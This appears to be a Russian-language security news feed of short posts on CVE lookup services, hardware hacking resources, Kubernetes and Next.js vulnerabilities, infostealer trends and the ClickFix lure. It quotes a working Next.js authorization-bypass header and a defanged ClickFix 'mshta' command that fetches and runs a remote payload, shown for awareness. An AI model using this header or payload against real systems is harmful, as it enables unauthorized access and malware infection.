У CIRCL (Computer Incident Response Center Luxembourg) есть интересная инициатива - vulnerability.circl.lu. Сервис, агрегирующий информацию о CVE из 12 источников.

Основной функционал похож на NVD (схожая карточка уязвимости), но сразу показывает EPSS Score и схожие уязвимости. Но без нюансов не обошлось: EPSS указывается не везде, может отсутствовать CVSS Severity (и ссылок на эксплоиты так же нет, что иногда встречается в NVD).

Но из особенностей можно отметить так называемые bundles - наборы уязвимостей, которые могут привести к эксплуатации.

Функционал сервиса состоит из проекта open-source проекта Vulnerability-Lookup и его можно развернуть у себя. Информацию о уязвимостях можно посмотреть как через веб-интерфейс (без регистрации и смс), так и через API:

Для использования API требуется регистрация и токен.

export VULN_LOOKUP_TOKEN="API_TOKEN"

Запрос curl:

curl -X 'GET' \
  'https://vulnerability.circl.lu/api/vulnerability/CVE-2024-43044' \
  -H 'accept: application/json' \
  -H "X-API-KEY: $VULN_LOOKUP_TOKEN" | jq

Так же есть библиотека для Python - PyVulnerabilityLookup

import os
from pyvulnerabilitylookup import PyVulnerabilityLookup

vuln_lookup = PyVulnerabilityLookup("https://vulnerability.circl.lu/", token=os.getenv("VULN_LOOKUP_TOKEN"))

sighting_cve_list = vuln_lookup.get_sightings(vuln_id='CVE-2024-43044')
print(sighting_cve_list)

Правда с библиотекой у меня получается кривой json, возможно есть смысл использовать условный requests.

Что есть ещё:
- Кастомные оповещения на email
- RSS/Atom фиды
- Создание, редактирование Security Advisories и ещё немного функционала, рассчитанного на ресёрчеров.

Штука однозначно интересная, хотя ещё довольно сырая. Информация о CVE может быть не полной, а часть метрик отсутствовать. Но проект новый, так что будем смотреть. Может и метрики починят (хотя бы EPSS).

Ссылки:
vulnerability.circl.lu
vulnerability.circl.lu
vulnerability.circl.lu: API
vulnerability.circl.lu: Bundles

Vulnerability Lookup
Vulnerability Lookup
Vulnerability Lookup: Installation
Vulnerability Lookup: Vulnerability Sources
Vulnerability Lookup: pyvulnerabilitylookup
GitHub: vulnerability-lookup

Снова wiki и снова взлом железочек. На этот раз HardBreak, an open-source Hardware Hacking Wiki.

Без срыва покровов и инноваций, но пошагово и в одном месте. Местами ещё есть пробелы, но работа автором проделана большая.

Что уже готово:
- Методология (Как вообще начать ковырять железки)
- Основы (Обзор общих протоколов и инструментов, необходимых для начала работы)
- Разведка (Выявление интересующих точек на печатной плате)
- Взаимодействие с интерфейсами (Как найти и использовать UART, JTAG, SPI)
- Обход мер защиты (voltage glitching)
- Практические ситуации на примере роутера Asus RT-N12 и дрона Parrot Anafi
- Анализ сети и Radio Hacking (в процессе)

Ссылки:
hardbreak.wiki
GitHub: HardBreak

crackme - как много в этом слове. По крайней мере было раньше. Статьи в Хакере, примеры решения в спираченой IDA Pro и прочее красноглазие.

Но для тех, кто ещё не едет в шесть утра на другой конец города за гречкой по скидке надо дать небольшое объяснение: crackme - небольшие программы, написанные для отработки навыков и\или соревнований среди реверсеров. Часто они писались на низкоуровневых C и Assembly, но встречались примеры и на С++. Сейчас же можно встретить Rust, Lua и даже GdScript.

Для тех, кто готов предаваться ностальгии или пощупать что-то новое есть - crackmy.app. На выбор больше 4 тысяч сrackmes (часть из которых с решением), некоторые людям в теме могут быть даже знакомы.

Для желающих погрузиться можно начать с Hack This Game (GdScript) или сразу пуститься во все тяжкие с Terry Davis (Assembly). Ставь лайк, если понял отсылку, или что там блогеры говорят.

Шёл 2025 год, а люди продолжают насиловать карликов делать из Raspberry Pi Pico логические анализаторы. В отличии от Scoop тут уже не 8 каналов, а 24 (заявлено до 120). Но разумеется, работает это всё не с голой Pico, или минимальной обвязкой, как было с тем же Scoop, а со своей платой и левел шифтером на TXU0104.

Без мобильного приложения, но и без платной подписки.

Сами платы можно заказать на PCBWay (если знаете, как обходить ограничения), или попробовать заказать у условного Резонита.
Так же можно заказать готовое устройство, но вопрос оплаты и доставки в РФ открыт.

Герберы/BOM/прошивки/софт можно забрать на:
Github / Mega

Исходники проекта открыты и доступны на Github.
Github: logicanalyzer
Github: logicanalyzer Wiki

Тут у Лукацкого появился пост, что HackerOne поломали, креды утекли и вообще всё пропало.
Однако, не всё так однозначно (на скрине).
Юзер забанен, тред удалён.

OWASP Project прирос ещё одним проектом - faction.

faction - платформа совместной работы для пентестеров и внутренних команд security-инженеров (но скорей больше для первых).

Что по функционалу:
- Ведение лога проверки в одном месте (с уязвимостями, заметками, чек-листами)
- Автоматизация генерирования отчётов
- Отслеживание устранения уязвимостей с алертами и SLA
- Для веберов есть плагин для Burp: Faction-Burp
- REST API для интеграции с другими инструментами
- При желании можно прикрутить аутентификацию через LDAP или OAuth

Можно запустить в docker:

git clone git@github.com:factionsecurity/faction.git
cd faction
docker-compose up --build

Github: faction
faction Docs
OWASP: Faction

Попался мне на глаза проект - CVSS-Threat Enhanced (CVSS-TE) Vulnerability Lookup

В чём суть: хоть у нас есть CVSS Base, CVSS-BT и EPSS, для приоритизации этого может быть недостаточно. Но для этого можно использовать модификатор на основе разных индикаторов, вроде CISA KEV или VulnCheck KEV, чтобы получился т.н Threat-enhanced scoring. Выглядит нагромождением, но задумка интересная.

Саму идею стоит полностью в репозитории на Github почитать, а ниже приведу часть размышлений автора:

Я наткнулся на интересный случай, он показывает, как традиционные системы оценки уязвимостей могут оказаться неэффективными при при определении приоритетности уязвимостей, которые активно эксплуатируются.

Уязвимость: CVE-2024-50302
Эта уязвимость была добавлена 3/4/2025 в каталог KEV (Known Exploited Vulnerabilities) но если бы вы смотрели на стандартные метрики, вы бы, вероятно, не стали определять ее приоритетность:
Базовый CVSS: 5.5 (MEDIUM)
CVSS-BT (с Temporal Metric): 5,5 (MEDIUM)
EPSS Score: 0,18% (крайне низкая вероятность эксплуатации).

Но вот что самое интересное - несмотря на эти показатели, данная уязвимость активно эксплуатируется in the wild.

Почему стандартные метрики уязвимостей подводят нас:
Я давно разочаровался в управлении уязвимостями, и этот пример затрагивает три проблемы, которые я постоянно вижу:
- Статические оценки: Базовые оценки CVSS застыли во времени, независимо от того, что происходит в реальном мире.
- Временные ограничения: Даже CVSS-BT (Base+Temporal) часто не очень хорошо отражает реальную активность эксплуатации.
- Вероятность против реальности: EPSS отлично подходит для статистической вероятности, но может пропустить целевые эксплойты.

В качестве дополнительного проекта я работаю над усовершенствованным алгоритмом оценки алгоритмом, который включает в себя источники информации об угрозах, чтобы обеспечить более практичную оценку риска. Я назвал его CVSS-TE.

Для этой конкретной уязвимости вот что она показала:
До добавления CISA KEV:
Базовый CVSS: 5.5 (MEDIUM)
CVSS-BT: 5.5 (MEDIUM)
CVSS-TE: 7.0 (HIGH) - повышение благодаря данным VulnCheck KEV.
Индикаторы: VulnCheck KEV

После добавления CISA KEV:
Базовый CVSS: 5.5 (MEDIUM)
CVSS-BT: 5.5 (MEDIUM)
CVSS-TE: 7.5 (HIGH) - Дальнейшее повышение
Индикаторы: CISA KEV + VulnCheck KEV

Техническая реализация
Алгоритм:
Использует стандартную оценку CVSS-BT в качестве базовой.
Применяет множитель качества, основанный на данных о надежности и эффективности эксплойтов
Добавляет коэффициенты анализа угроз из различных источников (CISA KEV, VulnCheck, EPSS, количество эксплойтов).
Используется взвешенная формула для предотвращения разбавления высококачественных эксплойтов.
Основная формула такова: CVSS-TE = min(10, CVSS-BT_Score * Quality_Multiplier + Threat_Intel_Factor - Time_Decay).

Факторы Threat intel взвешиваются примерно следующим образом:
Наличие CISA KEV: +1.0
VulnCheck KEV presence: +0.8
Высокий уровень EPSS (≥0,5): +0.5
Наличие нескольких источников эксплойтов: +0,25 - +0,75 в зависимости от количества

Интересная часть
Что делает эту уязвимость особенно интересной, так это контраст между ее оценкой EPSS (0,18%, что ничтожно мало) и тем фактом, что что она активно эксплуатируется. Это именно тот случай, который вероятностные модели могут пропустить.

Для меня это подтверждение того, что дополнение традиционных оценок реальными данными об угрозах, можно выявить то, что в противном случае могло бы ускользнуть от внимания.

Пример с CVE-2024-50302 может быть не совсем показателен, так как требуется физический доступ к устройству. Но сама идея интересная.
Ещё бы API к ней.

CVSS-Threat Enhanced (CVSS-TE) Vulnerability Lookup
Github.com: cvss-te

3 февраля Google Security Team опубликовали информацию о уязвимости в некоторых процессорах AMD Zen (Zen 1 - Zen4), которая позволяет злоумышленнику с привилегиями локального администратора загружать вредоносные патчи.
PoС из дисклоза.

За дисклозом вышла статья - Zen and the Art of Microcode Hacking, с подробным описанием как самого микрокода, так и обхода проверки.
А для особо любопытствующих, в репе Google Security Team доступен инструмент для работы с микрокодом - zentool.

Информация о CVE:
NIST: CVE-2024-56161
AMD: AMD SEV Confidential Computing Vulnerability

Ещё немного фидов с уязвимостями - fedisecfeeds.
Минималистично, но есть что нужно: сами CVE с CVSS, EPSS, ссылки на детекторы, эксплоиты и PoC, а так же ссылка на шаблон nuclei (если такой имеется).

А ещё можно получать фид в виде json.

Bettercap on Android: A Portable Network Security Toolkit

Bettercap на Android это не только весело, но и красиво. И портативно, разумеется (не считая торчащих антенн и донглов на OTG).

Можно использовать Nethunter, но для сильных духом есть другой путь - собрать всё самому.

Потребуется:
- Смартфон с Android (рутованый)
- Termux (не с Google Play, a с F-Droid или Github)
Так же есть смысл поставить ядро NetHunter, но это опционально.
Если вам нечем занять свои выходные, у меня для вас хороший вариант.

Build a $23 Wi-Fi Pineapple in 6 Minutes

Шёл 2025 год, а люди продолжают делать Wi-Fi Pineapple по дендро-фекальной методике. За многие годы процесс изменился не сильно: нас ожидает старый добрый OpenWRT и недорогие mips\mipsel роутеры.

Под капотом у нас не кастомная прошивка, а порт с оригинального Pineapple на базе OpenWRT v19.07.7. В списке "поддерживаемых" устройств указано 211 штук (данные с OpenWRT) , однако со статусом Available - 85. Если соберетесь собирать себе, лучше сверится со списком. Для ряда устройств есть уже готовые билды прошивок.

Но сам порт тоже не копирование 1:1 и некоторые изменения произошли и там:
Новый репозиторий модулей.
Обновлен репозиторий пакетов.
Проверены и исправлены зависимости
Обновлён Web-UI
Несколько новых модулей, которые необходимы для работы с подобными устройствами, вроде PMKIDAttack и Terminal.

В принципе, на выходе получается готовое устройство, но это всё ещё старый Wi-Fi Pineapple на OpenWRT v19.07.7.

Github: wifi-pineapple-cloner
Gitlab: wifi-pineapple-cloner-builds

Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication

Начните своё утро с чашки крепкого CVSS 9.8 в Ingress NGINX Controller для Kubernetes.

Набор уязвимостей (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098 и CVE-2025-1974) получил общее кодовое название IngressNightmare. Стоит отметить, что эти недостатки не затрагивают NGINX Ingress Controller, который является еще одной реализацией контроллера Ingress для NGINX и NGINX Plus.

Коротко о уязвимостях:
- CVE-2025-24513 (CVSS: 4,8) — уязвимость, связанная с неправильной проверкой входных данных, которая может привести к directory traversal внутри контейнера, что приведет к отказу в обслуживании (DoS) или ограниченному раскрытию секретных объектов из кластера в сочетании с другими уязвимостями.
- CVE-2025-24514 (CVSS: 8,8) — аннотация Ingress auth-url может использоваться для внедрения конфигурации в NGINX, что приводит к выполнению произвольного кода в контексте контроллера ingress-nginx и раскрытию секретов, доступных контроллеру.
- CVE-2025-1097 (CVSS: 8,8) — аннотация Ingress auth-tls-match-cn может использоваться для внедрения конфигурации в NGINX, что приводит к выполнению произвольного кода в контексте контроллера ingress-nginx и раскрытию секретов, доступных контроллеру.
- CVE-2025-1098 (CVSS: 8,8) — аннотации Mirror-Target и Mirror-Host Ingress могут использоваться для внедрения произвольной конфигурации в NGINX, что приводит к выполнению произвольного кода в контексте контроллера Ingress-nginx и раскрытию секретов, доступных контроллеру.
- CVE-2025-1974 (CVSS: 9,8) — неаутентифицированный злоумышленник, имеющий доступ к сети модулей, может выполнить произвольный код в контексте контроллера ingress-nginx при определенных условиях.

Wiz выпустили детальную статью IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX с подробным описанием работы уязвимости, а так же процессом детекта и митигации.

Doing the Due Diligence: Analyzing the Next.js Middleware Bypass (CVE-2025-29927)

А вот и разбор CVE-2025-29927 подоспел.

Коротко о CVE-2025-29927: критическая уязвимость в Next.js, которая позволяет обойти проверки авторизации, что связанно с неправильной обработкой заголовков x-middleware-subrequest внутри middleware.
Для обхода защиты достаточно добавить HTTP-заголовок:

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

Проблема затрагивает версии с 11.1.4 по 15.2.2.

PoC:
Github: aydinnyunus/CVE-2025-29927

NIST: CVE-2025-29927
Github Advisory Database: CVE-2025-29927
Next.js Blog: CVE-2025-29927

К IngressNightmare появился PoC + Detect c очередным разбором патча и уязвимости.

Так же для детекта можно использовать шаблон nuclei.

Tunneling corporate firewalls for developers

Учимся тунеллировать трафик у разрабов (но не у всех) или хозяйке атакующему на заметку. А если без шуток, автор статьи как заправский редтимер показывает примеры тунеллирования с обходом фаерволла с использованием ssh и веб-сервера на одном порту (с применением sslh) , прокси (с применением ssh-connect, corkscrew и proxytunnel) и DPI (с применением openssl).

И то, что применимо для ssh, работает с scp/sftp и rsync.
Всё с примерами перехвата трафика (правда без самих pcap).

Можно конечно использовать ngrok, но это не так интересно.

Немного о трендах текущего времени.

Последние полгода (может даже чуть больше) были очень богаты на новости о инфостиллерах. Или современные злоумышленники обленились, или пользователи стали более доверчивы или менее внимательны. Но суть не только в этом. Если ранее под удар попадали работники крупных и не очень компаний, то сейчас и обычные люди могут представлять интерес для злоумышленников.

Кроме роста заражений особо новинок нет, распространение через почту и мессенджеры, а так же преимущественно заражается BYOD, а не корпоративное устройство.

Немного хайлайтов:
- NL Times - Info stealer computer viruses have stolen data from over 40,000 in the Netherlands

- Check Point Software - Infostealer attacks surged by 58%, revealing a maturing cyber ecosystem. Over 70% of infected devices were personal, as threat actors targeted bring-your-own device (BYOD) environments to breach corporate resources

- Hudson Rock - The landscape of cyber threats has been shifting dramatically in recent years, with a notable transition from traditional botnets to a more insidious form of malware: Infostealers. Cybercriminals now favor Infostealers for their efficiency and profitability.

- Huntress - Infostealers aren’t just a passing trend—they’re a cornerstone of modern cyber threats, driving nearly a quarter (24%) of all cyber incidents in 2024

- Recorded Future - Credentials are frequently stolen by information-stealing malware, or infostealers, that are built to target a variety of operating systems and mobile devices. Credential theft per device has risen 25% since 2021

- CrowdStrike - Abusing valid accounts has become the primary initial access vector to the cloud, accounting for 35% of cloud incidents in the first half of 2024, one likely initial access mechanism is leveraging information stealers; during 2024, threat actors updated Stealc and Vidar to target cloud accounts

- SpyCloud - The rapid rise of malware, specifically infostealers, is one of the biggest trends we continue to observe. In 2023 alone, infostealer malware use tripled. We saw stealers skyrocket in our recaptured data, with as many as 1 in 5 people already the victims of an infostealer infection

- Sophos - Data theft is the focus of most malware targeting small and medium businesses—password stealers, keyboard loggers, and other spyware made up nearly half of malware detections

- Mandiant - We anticipate the use of stolen credentials to persist into 2025, with infostealers continuing to serve as a primary vector to obtain them

- Hudson Rock - StreamElements, a popular cloud-based streaming platform, has confirmed a significant data breach involving a third-party service provider, following reports of stolen data being offered for sale on a hacking forum

- Hudson Rock - Royal Mail Group Loses 144GB to Infostealers: Same Samsung Hacker, Same 2021 Infostealer Log

Нельзя обойти стороной работающих по ru особям лицам, активно распространяющие apk в Telegram. Метод топорный, но работающий.

Так что не забывайте прокачивать Security Awareness, как свой, так и окружающих вас лиц. И коллег. Может перестанут вас окружать.

И небольшая инфографика от Hudson Rock.

CVE-2025-31115: XZ Utils Hit Again with High-Severity Multithreaded Decoder Bug

Скучали по уязвимостям в XZ Utils? Их есть у меня.

В новостях сегодня XZ Utils и снова CVE в нём: CVE-2025-31115 c CVSS: 8.7. CVE-2025-31115 затрагивает версии XZ Utils с 5.3.3alpha по 5.8.0, приводя к серьезной ошибке использования кучи после освобождения в ее многопоточном декодере, способной вызывать сбои или повреждение памяти, что приведет к непредсказуемому поведению программы или даже к возможности выполнения произвольного кода.

Исправление этой уязвимости уже вышло. Версия XZ Utils 5.8.1 устраняет эту ошибку. Исправление также было применено к веткам v5.4, v5.6, v5.8 и master репозитория xz Git.

Не так критично (да и EPSS пока 0.05), как CVE-2024-3094 (если кто забыл статьи на Wikipedia и Akamai), но лучше не затягивать с обновлением.

Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape

Это настолько плохо, что даже хорошо.

Глупая, но рабочая схема развертывания малвари, о которой были новости в прошлом году, развернулась с новой силой и получила своё название - ClickFix.

В чём суть:
ClickFix имитирует привычную captcha, при нажатии на которую ждёт три замечательных шага:
- Открываем "Выполнить" (оно же Run) хоткеем Win + R
- Вставляем содержимое из буфера обмена
- Запускаем

Пример пейлоада:

mshta hxxps[:]//join-to-12-homework[.]sbs/r2lkXFb7IXX2GSXp[.]html #'' I'm human ID216292''

Что получает пользователь?
- Подключение к С2
- Отключение логов
- Загрузка дополнительной нагрузки
- Закрепление
- Эксфильтрация данных.

MalwareBazaar Database: ClickFix
Medium - SquareX Labs: ClickFix: Social Engineering That Bypasses EDRs, SWGs and Humans